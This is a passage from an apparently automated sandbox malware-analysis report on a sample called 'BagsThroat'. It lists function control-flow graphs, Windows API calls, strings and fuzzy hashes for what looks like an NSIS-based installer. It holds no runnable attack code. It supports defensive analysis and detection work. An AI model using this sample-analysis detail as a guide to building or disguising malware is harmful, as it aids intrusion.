766->770 767->739 774 403536 767->774 772 403513-40351e 768->772 773 4034f3-403507 WriteFile 768->773 769->765 769->770 775 4034e5 770->775 777 403521-403525 772->777 773->760 776 403509-40350c 773->776 774->738 775->765 776->760 778 40350e-403511 776->778 777->756 779 40352b 777->779 778->777 779->738
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004033F1
                                        • GetTickCount.KERNEL32 ref: 00403492
                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                        • wsprintfW.USER32 ref: 004034CE
                                        • WriteFile.KERNELBASE(00000000,00000000,00424579,00403792,00000000), ref: 004034FF
                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CountFileTickWrite$wsprintf
                                        • String ID: (]C$... %d%%$pAB$yEB
                                        • API String ID: 651206458-486274953
                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                        Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 780 404f9e-404fb1 781 404fb7-404fca 780->781 782 40506e-405070 780->782 783 404fd5-404fe1 lstrlenW 781->783 784 404fcc-404fd0 call 406831 781->784 786 404fe3-404ff3 lstrlenW 783->786 787 404ffe-405002 783->787 784->783 788 404ff5-404ff9 lstrcatW 786->788 789 40506c-40506d 786->789 790 405011-405015 787->790 791 405004-40500b SetWindowTextW 787->791 788->787 789->782 792 405017-405059 SendMessageW * 3 790->792 793 40505b-40505d 790->793 791->790 792->793 793->789 794 40505f-405064 793->794 794->789
                                        APIs
                                        • lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                        • lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                        • String ID:
                                        • API String ID: 2740478559-0
                                        • Opcode ID: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                        • Opcode Fuzzy Hash: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 795 402713-40273b call 406035 * 2 800 402746-402749 795->800 801 40273d-402743 call 40145c 795->801 803 402755-402758 800->803 804 40274b-402752 call 40145c 800->804 801->800 807 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 803->807 808 40275a-402761 call 40145c 803->808 804->803 808->807
                                        APIs
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWritelstrcpyn
                                        • String ID: 176$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                        • API String ID: 247603264-2230508642
                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 816 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 827 402223-4030f2 call 4062cf 816->827 828 40220d-40221b call 4062cf 816->828 828->827
                                        APIs
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                        • API String ID: 3156913733-2180253247
                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                        Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 836 405eab-405eb7 837 405eb8-405eec GetTickCount GetTempFileNameW 836->837 838 405efb-405efd 837->838 839 405eee-405ef0 837->839 841 405ef5-405ef8 838->841 839->837 840 405ef2 839->840 840->841
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 842 402175-40218b call 401446 * 2 847 402198-40219d 842->847 848 40218d-402197 call 4062cf 842->848 849 4021aa-4021b0 EnableWindow 847->849 850 40219f-4021a5 ShowWindow 847->850 848->847 852 4030e3-4030f2 849->852 850->852
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                        • String ID: HideWindow
                                        • API String ID: 1249568736-780306582
                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                        Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                        Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                        Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Char$Next$CreateDirectoryPrev
                                        • String ID:
                                        • API String ID: 4115351271-0
                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                        Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
